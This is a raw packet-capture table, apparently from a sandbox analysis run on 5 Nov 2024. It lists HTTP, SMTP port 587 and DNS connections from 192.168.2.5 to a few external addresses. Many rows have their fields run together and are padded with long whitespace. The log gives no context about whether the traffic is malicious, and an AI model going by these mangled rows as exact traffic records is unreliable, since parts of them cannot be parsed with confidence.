Nov 5, 2024 17:04:50.637254000 CET  62012        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:50.642420053 CET  80           62012      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:50.642488003 CET  62012        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:50.643038034 CET  62012        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:50.643065929 CET  62012        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:50.647908926 CET  80           62012      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:50.647939920 CET  80           62012      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:50.904074907 CET  59825        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:50.909190893 CET  587          59825      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:51.142400980 CET  587          59825      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:51.186244965 CET  59825        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:51.186911106 CET  62013        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:51.191787958 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:51.192572117 CET  62013        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:51.256515026 CET  62014        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:51.261584044 CET  587          62014      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:51.261692047 CET  62014        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:51.305202007 CET  80           62012      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:51.305516005 CET  62012        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:51.310966969 CET  80           62012      44.221.84.105    192.168.2.5
Nov 5, 2024 17:04:51.311085939 CET  62012        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:04:52.000751972 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.000935078 CET  62013        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:52.005846977 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.154167891 CET  587          62014      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.154310942 CET  62014        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:52.159285069 CET  587          62014      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.244342089 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.244560003 CET  62013        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:52.249455929 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.398608923 CET  587          62014      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.398778915 CET  62014        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:52.404501915 CET  587          62014      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.505745888 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.506181955 CET  62013        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:52.511122942 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.644256115 CET  587          62014      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.644644022 CET  62014        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:52.649547100 CET  587          62014      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.760621071 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.760719061 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.760730982 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.760792017 CET  62013        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:52.760910034 CET  587          62013      51.195.88.199    192.168.2.5
Nov 5, 2024 17:04:52.760957003 CET  62013        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:52.762243032 CET  62013        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:04:52.768356085 CET  587          62013      51.195.88.199    192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.903125048 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.903184891 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.903289080 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.903363943 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.904608965 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.911794901 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.009540081 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.010591984 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.019562960 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.151217937 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.152195930 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.158051014 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.263032913 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.263288021 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.268177032 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.396684885 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.397247076 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.402307034 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.506742954 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.507046938 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.511938095 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.641979933 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.642313957 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.648463964 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.762989998 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.763387918 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.768728018 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.890733957 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.891007900 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:53.895895958 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.007050991 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.007344961 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.013030052 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.135144949 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.135508060 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.141551971 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.261878014 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.262109995 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.267090082 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.385190010 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.385406971 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.390325069 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.505645990 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.506409883 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.506472111 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.506531954 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.506711006 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.509341955 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.511470079 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.511490107 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.511499882 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.511507034 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.511574984 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.514328003 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.514338970 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.514367104 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.514375925 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.514411926 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.514439106 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637152910 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637167931 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637172937 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637176991 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637217999 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637224913 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637226105 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637268066 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637283087 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.637314081 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.639978886 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.640033007 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.640077114 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.640122890 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.641958952 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642041922 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642086029 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642096996 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642123938 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642142057 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642158031 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642194986 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642222881 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642247915 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642256975 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642266989 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642268896 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642311096 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.642338991 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.644865990 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.644939899 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.645011902 CET62014587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.646914959 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647156000 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647206068 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647269964 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647322893 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647392988 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647406101 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647425890 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647433996 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647469044 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647556067 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647566080 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647573948 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647592068 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647603035 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647620916 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647629976 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647711992 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647722960 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.647731066 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.649867058 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.649890900 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.649975061 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.649983883 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.650074959 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.650084019 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:54.650093079 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:55.024096012 CET5876201351.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:55.075071096 CET62013587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:55.149166107 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:55.360827923 CET5876201451.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:55.360891104 CET62014587192.168.2.551.195.88.199
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.788618088 CET5401553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.796134949 CET53540151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.438602924 CET5655953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.446882963 CET53565591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.842443943 CET5518653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.850109100 CET53551861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.769188881 CET4996053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.777198076 CET53499601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.528505087 CET5558953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.539670944 CET53555891.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.233856916 CET5430853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.241432905 CET53543081.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.483865023 CET5943453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.493063927 CET53594341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.646476030 CET5852953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.654068947 CET53585291.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.718158960 CET6062853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.725347996 CET53606281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.665539026 CET6300153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.673041105 CET53630011.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.135319948 CET5229953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.325823069 CET53522991.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.091712952 CET6019453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.099208117 CET53601941.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.364371061 CET5473653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.459862947 CET53547361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.052037954 CET4988453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.061830997 CET53498841.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.164278030 CET6341553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.171696901 CET53634151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.055524111 CET6455253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.062865019 CET53645521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.024507046 CET6506053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.031534910 CET53650601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.532598019 CET5400753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.541054010 CET53540071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.898556948 CET6409053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.906058073 CET53640901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.234920025 CET5856153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.242202044 CET53585611.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.792285919 CET6155153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.800015926 CET53615511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.120327950 CET5853953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.127516985 CET53585391.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.987751961 CET5418053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.998137951 CET53541801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.487055063 CET6465453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.497526884 CET53646541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.498161077 CET5017353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.505578041 CET53501731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.704293013 CET6375353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.725745916 CET53637531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.588159084 CET5615553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.595817089 CET53561551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.478523970 CET5554153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.487639904 CET53555411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.617386103 CET6039353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.625319004 CET53603931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:50.373764992 CET6520753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:50.481975079 CET53652071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.802061081 CET5325853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.810997009 CET53532581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.503251076 CET5564153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.511250019 CET53556411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.515969038 CET5194453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.523933887 CET53519441.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.526822090 CET6406853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.534636974 CET53640681.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.009558916 CET5686453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.195393085 CET53568641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.319135904 CET5469753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.327512026 CET53546971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.224877119 CET5979853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.232753038 CET53597981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.276974916 CET6169753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.283970118 CET53616971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.685724020 CET6512853192.168.2.51.1.1.1
